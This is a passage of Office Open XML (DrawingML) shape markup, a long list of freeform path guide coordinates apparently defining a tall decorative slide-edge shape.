              <a:gd name="connsiteY92" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY133" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY134" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 499826 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY133" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
